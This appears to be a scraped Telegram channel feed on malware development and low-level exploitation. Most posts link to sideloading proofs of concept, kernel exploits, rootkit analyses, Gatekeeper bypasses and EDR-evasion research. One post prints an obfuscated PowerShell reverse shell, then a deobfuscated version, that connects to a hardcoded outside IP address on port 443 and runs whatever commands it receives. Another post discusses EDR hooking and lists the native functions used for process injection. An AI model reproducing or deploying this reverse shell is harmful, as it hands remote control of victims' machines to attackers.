#malware_development #maldev #hooking
@ZwLowLevel
https://github.com/kas-sec/version.dll-sideloading.git
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - kas-sec/version.dll-sideloading: sideloading PoC using onedrive.exe & version.dll
sideloading PoC using onedrive.exe & version.dll. Contribute to kas-sec/version.dll-sideloading development by creating an account on GitHub.
Forwarded from Golden Byte
#kernel_exploit #ps5 #binary_exploitation
@ZwLowLevel
https://github.com/MeisterLone/no_ctrl
Please open Telegram to view this post
VIEW IN TELEGRAM
#rootkit #linux_kernel #evasive_malware
@ZwLowLevel
https://www.synacktiv.com/en/publications/linkpro-ebpf-rootkit-analysis
Please open Telegram to view this post
VIEW IN TELEGRAM
Synacktiv
LinkPro: eBPF rootkit analysis
#apple_exploit #macos #malware
@ZwLowLevel
https://pberba.github.io/security/2025/11/11/macos-infection-vector-applenoscript-bypass-gatekeeper/
Please open Telegram to view this post
VIEW IN TELEGRAM
pepe berba
MacOS Infection Vector: Using AppleScripts to bypass Gatekeeper
A look at how threat actors are abusing AppleScript .scpt files to deliver macOS malware, from fake documents to browser update lures, and how these noscripts ...
#hardware_hacking #iot
@ZwLowLevel
https://hackmag.com/security/gadgets-howto-3
Please open Telegram to view this post
VIEW IN TELEGRAM
HackMag
Home IoT Device Teardown and Analysis: A Complete Guide to Hardware Hacking
Tech magazine for cybersecurity specialists
No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE
#binary_exploitation #exploitation #aslr_bypass #rop_chain #rce
@ZwLowLevel
https://modzero.com/en/blog/no-leak-no-problem/
Modzero
No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE
How a Catch-22 Breaks AMD SEV-SNP
(ACM CCS 2025)
(ACM CCS 2025)
#amd #sev_snp #os_internals
@ZwLowLevel
https://rmpocalypse.github.io/rmpocalypse-CCS2025.pdf
RMPocalypse Attack
How A Catch-22 Breaks AMD SEV-SNP
${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()Ahora desofuscado:
$ip = "62.113.66.7"
$port = 443
$client = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $client.GetStream()
[byte[]]$buffer = 0..8191 | ForEach-Object { 0 }
while (($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
$command = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
$result = ([System.Management.Automation.PowerShell]::Create()).AddScript($command).Invoke() | Out-String
$bytes = [System.Text.Encoding]::ASCII.GetBytes($result)
$stream.Write($bytes, 0, $bytes.Length)
$stream.Flush()
}
$client.Close()
@ZwLowLevel
Please open Telegram to view this post
VIEW IN TELEGRAM
Se pueden observar las anomalías del stack frame cuando se hace uso de la librería de Detours para implementar user land hooks. En este contexto, se implementan hooks en MessageBoxW, poco realista en el mundo real para los proveedores de seguridad, pero en un contexto real, los EDR despliegan sensores para monitorear las llamadas a las funciones nativas (Nt*) en una variedad de contextos, como por ejemplo:
Funciones para la injeccion de procesos:
El mapeo de objetos de sesión en memoria:
@ZwLowLevel
En resumen, aunque los proveedores de seguridad utilizan una variedad de sensores para recolectar telemetría en un entorne, el hooking hoy en día sigue siendo un método poderoso para identificar un call stack anómalo.
Funciones para la injeccion de procesos:
NtOpenProcess
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx
El mapeo de objetos de sesión en memoria:
NtCreateSection
NtMapViewOfSection
NtUnmapViewOfSection
@ZwLowLevel
En resumen, aunque los proveedores de seguridad utilizan una variedad de sensores para recolectar telemetría en un entorne, el hooking hoy en día sigue siendo un método poderoso para identificar un call stack anómalo.
This project demonstrates CodeDefenders ability to obfuscate kernel and bootloader files. The modified system includes obfuscated critical system functions and bypassed security mechanisms.
#low_level #windows_kernel #windows_internals #uefi #bootloader
@ZwLowLevel
https://github.com/codedefender-io/windows
Please open Telegram to view this post
VIEW IN TELEGRAM
#loader #crypter #edr_bypass #malware #ppl
@ZwLowLevel
https://www.elastic.co/security-labs/roningloader
Please open Telegram to view this post
VIEW IN TELEGRAM
www.elastic.co
RONINGLOADER: DragonBreath’s New Path to PPL Abuse — Elastic Security Labs
Elastic Security Labs uncovers RONINGLOADER, a multi-stage loader deploying DragonBreath’s updated gh0st RAT variant. The campaign weaponizes signed drivers, thread-pool injection, and PPL abuse to disable Defender and evade Chinese EDR tools.
#xbox360 #os_internals #debugging #low_level
@ZwLowLevel
https://randomascii.wordpress.com/2018/01/07/finding-a-cpu-design-bug-in-the-xbox-360/
Please open Telegram to view this post
VIEW IN TELEGRAM
Random ASCII - tech blog of Bruce Dawson
Finding a CPU Design Bug in the Xbox 360
The recent reveal of Meltdown and Spectre reminded me of the time I found a related design bug in the Xbox 360 CPU – a newly added instruction whose mere existence was dangerous. Back in 2005 I was…
This media is not supported in your browser
VIEW IN TELEGRAM
#macos #ios #reverse_engineering #reversing
@ZwLowLevel
https://hexai.re/blog/reversing-swift-like-a-pro
Please open Telegram to view this post
VIEW IN TELEGRAM